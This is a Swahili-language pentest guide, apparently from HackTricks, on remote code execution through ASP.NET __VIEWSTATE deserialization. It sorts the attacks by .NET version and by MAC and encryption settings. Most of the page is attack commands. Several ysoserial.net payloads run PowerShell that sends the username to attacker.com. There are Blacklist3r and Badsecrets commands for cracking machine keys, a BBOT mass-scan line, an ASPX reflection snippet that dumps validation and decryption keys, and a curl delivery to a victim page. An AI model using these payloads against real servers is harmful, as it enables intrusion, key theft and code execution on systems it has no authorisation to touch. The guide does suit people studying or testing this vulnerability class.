# Kutumia \_\_VIEWSTATE bila kujua siri

{{#include ../../banners/hacktricks-training.md}}



## Nini maana ya ViewState

**ViewState** inatumika kama mekanizma ya kawaida katika ASP.NET kudumisha data za ukurasa na udhibiti kati ya kurasa za wavuti. Wakati wa uwasilishaji wa HTML ya ukurasa, hali ya sasa ya ukurasa na thamani zinazopaswa kuhifadhiwa wakati wa postback zinahifadhiwa katika nyuzi za base64. Nyuzi hizi kisha zinawekwa katika maeneo ya ViewState yaliyofichwa.

Taarifa za ViewState zinaweza kuainishwa kwa mali zifuatazo au mchanganyiko wao:

- **Base64**:
- Muundo huu unatumika wakati sifa za `EnableViewStateMac` na `ViewStateEncryptionMode` zimewekwa kuwa za uongo.
- **Base64 + MAC (Nambari ya Uthibitishaji wa Ujumbe) Imewezeshwa**:
- Kuanzishwa kwa MAC kunapatikana kwa kuweka sifa ya `EnableViewStateMac` kuwa ya kweli. Hii inatoa uthibitisho wa uaminifu kwa data za ViewState.
- **Base64 + Imefichwa**:
- Ufunguo unatumika wakati sifa ya `ViewStateEncryptionMode` imewekwa kuwa ya kweli, kuhakikisha usiri wa data za ViewState.

## Mifano ya Mtihani

Picha ni jedwali linaloelezea usanidi tofauti wa ViewState katika ASP.NET kulingana na toleo la mfumo wa .NET. Hapa kuna muhtasari wa maudhui:

1. Kwa **toleo lolote la .NET**, wakati MAC na Ufunguo zimezimwa, MachineKey haitahitajika, na hivyo hakuna njia inayofaa ya kuibaini.
2. Kwa **matoleo chini ya 4.5**, ikiwa MAC imewezeshwa lakini Ufunguo haujawekwa, MachineKey inahitajika. Njia ya kuibaini MachineKey inajulikana kama "Blacklist3r."
3. Kwa **matoleo chini ya 4.5**, bila kujali ikiwa MAC imewezeshwa au kuzimwa, ikiwa Ufunguo umewezeshwa, MachineKey inahitajika. Kuibaini MachineKey ni kazi ya "Blacklist3r - Maendeleo ya Baadaye."
4. Kwa **matoleo 4.5 na juu**, mchanganyiko wote wa MAC na Ufunguo (iwe zote ni za kweli, au moja ni ya kweli na nyingine ni ya uongo) yanahitaji MachineKey. MachineKey inaweza kuibainishwa kwa kutumia "Blacklist3r."

### Mfano wa Mtihani: 1 – EnableViewStateMac=false na viewStateEncryptionMode=false

Pia inawezekana kuzima ViewStateMAC kabisa kwa kuweka funguo ya rejista ya `AspNetEnforceViewStateMac` kuwa sifuri katika:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
```
**Kutambua Sifa za ViewState**

Unaweza kujaribu kutambua ikiwa ViewState ina ulinzi wa MAC kwa kukamata ombi linalojumuisha parameter hii kwa kutumia BurpSuite. Ikiwa Mac haijatumiwa kulinda parameter hiyo unaweza kuitumia kwa kutumia [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
```
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
```
### Test case 1.5 – Kama Test case 1 lakini cookie ya ViewState haitumwi na seva

Wakandarasi wanaweza **kuondoa ViewState** ili isiwe sehemu ya Ombi la HTTP (mtumiaji hatapokea cookie hii).\
Mtu anaweza kudhani kwamba ikiwa **ViewState** haipo, utekelezaji wao ni **salama** kutokana na udhaifu wowote unaoweza kutokea kutokana na deserialization ya ViewState.\
Hata hivyo, hiyo si hali halisi. Ikiwa tuta **ongeza parameter ya ViewState** kwenye mwili wa ombi na kutuma payload yetu iliyosajiliwa iliyoundwa kwa kutumia ysoserial, bado tutakuwa na uwezo wa kufikia **utendaji wa msimbo** kama inavyoonyeshwa katika **Case 1**.

### Test Case: 2 – .Net < 4.5 na EnableViewStateMac=true & ViewStateEncryptionMode=false

Ili **kuwezesha ViewState MAC** kwa **ukurasa maalum** tunahitaji kufanya mabadiliko yafuatayo kwenye faili maalum la aspx:
```bash
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
```
Tunaweza pia kufanya hivyo kwa **jumla** ya programu kwa kuweka kwenye faili la **web.config** kama inavyoonyeshwa hapa chini:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>
```
Kama parameter imekingwa na MAC wakati huu ili kufanikisha shambulio, kwanza tunahitaji funguo iliyotumika.

Unaweza kujaribu kutumia [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) kupata funguo iliyotumika.
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value
```
[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) ni chombo kingine ambacho kinaweza kubaini machineKeys zinazojulikana. Imeandikwa kwa Python, hivyo tofauti na Blacklist3r, hakuna utegemezi wa Windows. Kwa viewstates za .NET, kuna "python blacklist3r" utility, ambayo ni njia ya haraka zaidi ya kuitumia.

Inaweza kutolewa moja kwa moja na viewstate na generator:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
```
![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)

Au, inaweza kuungana moja kwa moja na URL ya lengo na kujaribu kuchora viewstate kutoka kwa HTML:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
```
![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)

Ili kutafuta viewstates zenye udhaifu kwa kiwango kikubwa, pamoja na uainishaji wa subdomain, moduli ya `badsecrets` [**BBOT**](exploiting-__viewstate-parameter.md) inaweza kutumika:
```
bbot -f subdomain-enum -m badsecrets -t evil.corp
```
![https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)

Ikiwa umefanikiwa na ufunguo umepatikana, unaweza kuendelea na shambulio ukitumia [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}
```
Katika hali ambapo parameter ya `_VIEWSTATEGENERATOR` **haitumwi** na seva hu **hitaji** kutoa parameter ya `--generator` **bali hizi**:
```bash
--apppath="/" --path="/hello.aspx"
```
### Test Case: 3 – .Net < 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true

Katika hii haijulikani kama parameter inalindwa na MAC. Basi, thamani hiyo labda imefungwa na utahitaji **Machine Key ili kufunga payload yako** ili kutumia udhaifu huo.

**Katika kesi hii** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **moduli iko katika maendeleo...**

**Kabla ya .NET 4.5**, ASP.NET inaweza **kubali** \_`__VIEWSTATE`\_parameter **isiyo na usimbuaji** kutoka kwa watumiaji **hata** kama **`ViewStateEncryptionMode`** imewekwa kuwa _**Daima**_. ASP.NET **inaangalia tu** **uwepo** wa **`__VIEWSTATEENCRYPTED`** parameter katika ombi. **Ikiwa mtu atafuta parameter hii, na kutuma payload isiyo na usimbuaji, bado itashughulikiwa.**

Hivyo basi ikiwa washambuliaji wataweza kupata Machinekey kupitia udhaifu mwingine kama vile file traversal, [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) amri iliyotumika katika **Kesi ya 2**, inaweza kutumika kufanya RCE kwa kutumia udhaifu wa deserialization wa ViewState.

- Ondoa parameter `__VIEWSTATEENCRYPTED` kutoka kwa ombi ili kutumia udhaifu wa deserialization wa ViewState, vinginevyo itarudisha kosa la uthibitishaji wa Viewstate MAC na udhaifu utafaulu.

### Test Case: 4 – .Net >= 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true/false except both attribute to false

Tunaweza kulazimisha matumizi ya mfumo wa ASP.NET kwa kubainisha parameter iliyo hapa chini ndani ya faili ya web.config kama inavyoonyeshwa hapa chini.
```xml
<httpRuntime targetFramework="4.5" />
```
Mbadala, hii inaweza kufanywa kwa kubainisha chaguo lililo hapa chini ndani ya parameter ya `machineKey` ya faili la web.config.
```bash
compatibilityMode="Framework45"
```
Kama ilivyo katika ya awali, **thamani imefungwa.** Kisha, ili kutuma **payload halali, mshambuliaji anahitaji funguo.**

Unaweza kujaribu kutumia [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)kutafuta funguo inayotumika:
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}
```
Kwa maelezo ya kina zaidi kuhusu IISDirPath na TargetPagePath [rejea hapa](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)

Au, na [**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) (ikiwa na thamani ya jenereta):
```bash
cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415
```
![https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)

Mara tu funguo halali la Mashine linapopatikana, **hatua inayofuata ni kuzalisha payload iliyosajiliwa kwa kutumia** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
```
ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
```
Ikiwa una thamani ya `__VIEWSTATEGENERATOR` unaweza kujaribu **kutumia** parameter `--generator` na thamani hiyo na **kuacha** parameters `--path` na `--apppath`

![](https://notsosecure.com/sites/all/assets/group/nss_uploads/2019/06/4.2.png)

Kufanikiwa kwa kutumia udhaifu wa deserialization ya ViewState kutasababisha ombi la nje ya bendi kwa seva inayodhibitiwa na mshambuliaji, ambayo inajumuisha jina la mtumiaji. Aina hii ya exploit inaonyeshwa katika uthibitisho wa dhana (PoC) ambayo inaweza kupatikana kupitia rasilimali iliyo na kichwa "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". Kwa maelezo zaidi juu ya jinsi mchakato wa unyakuzi unavyofanya kazi na jinsi ya kutumia zana kama Blacklist3r kwa kutambua MachineKey, unaweza kupitia [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC).

### Test Case 6 – ViewStateUserKeys inatumika

Mali ya **ViewStateUserKey** inaweza kutumika **kulinda** dhidi ya **CSRF attack**. Ikiwa funguo kama hizo zimewekwa katika programu na tunajaribu kuunda payload ya **ViewState** kwa kutumia mbinu zilizozungumziwa hadi sasa, **payload haitashughulikiwa na programu**.\
Unahitaji kutumia parameter moja zaidi ili kuunda payload kwa usahihi:
```bash
--viewstateuserkey="randomstringdefinedintheserver"
```
### Matokeo ya Utekelezaji Uliofanikiwa <a href="#poc" id="poc"></a>

Kwa kesi zote za mtihani, ikiwa payload ya ViewState YSoSerial.Net inafanya kazi **kwa mafanikio** basi seva inajibu na “**500 Internal server error**” ikiwa na maudhui ya majibu “**Taarifa ya hali si halali kwa ukurasa huu na inaweza kuwa imeharibika**” na tunapata ombi la OOB.

Angalia [maelezo zaidi hapa](<https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/[**https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)/README.md>)

### Kutupa Funguo za Mashine za ASP.NET kupitia Reflection (SharPyShell/SharePoint ToolShell)

Wavamizi ambao wanaweza **kupakia au kutekeleza msimbo wa ASPX wa kiholela** ndani ya mizizi ya wavuti ya lengo wanaweza moja kwa moja kupata funguo za siri zinazolinda `__VIEWSTATE` badala ya kuzitafutia kwa nguvu.
Payload ndogo inayovuja funguo inatumia madarasa ya ndani ya .NET kupitia reflection:
```csharp
<%@ Import Namespace="System.Web.Configuration" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
public void Page_Load(object sender, EventArgs e)
{
var asm = Assembly.Load("System.Web");
var sect = asm.GetType("System.Web.Configuration.MachineKeySection");
var m = sect.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
var cfg = (MachineKeySection)m.Invoke(null, null);
// Output: ValidationKey|DecryptionKey|Algorithm|CompatibilityMode
Response.Write($"{cfg.ValidationKey}|{cfg.DecryptionKey}|{cfg.Decryption}|{cfg.CompatibilityMode}");
}
</script>
```
Kuomba ukurasa kunachapisha **ValidationKey**, **DecryptionKey**, algorithm ya usimbuaji na hali ya ulinganifu ya ASP.NET. Thamani hizi sasa zinaweza kuingizwa moja kwa moja kwenye **ysoserial.net** ili kuunda gadget halali, iliyosainiwa `__VIEWSTATE`:
```bash
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"whoami\"" \
--generator=<VIEWSTATE_GENERATOR> \
--validationkey=<VALIDATION_KEY> --validationalg=<VALIDATION_ALG> \
--decryptionkey=<DECRYPTION_KEY> --decryptionalg=<DECRYPTION_ALG> \
--islegacy --minify
curl "http://victim/page.aspx?__VIEWSTATE=<PAYLOAD>"
```
Hii **key-exfiltration primitive** ilitumiwa kwa wingi dhidi ya seva za SharePoint za ndani mwaka 2025 ("ToolShell" – CVE-2025-53770/53771), lakini inatumika kwa programu yoyote ya ASP.NET ambapo mshambuliaji anaweza kukimbia msimbo wa upande wa seva.

## References

- [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
- [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
- [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
- [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/)



{{#include ../../banners/hacktricks-training.md}}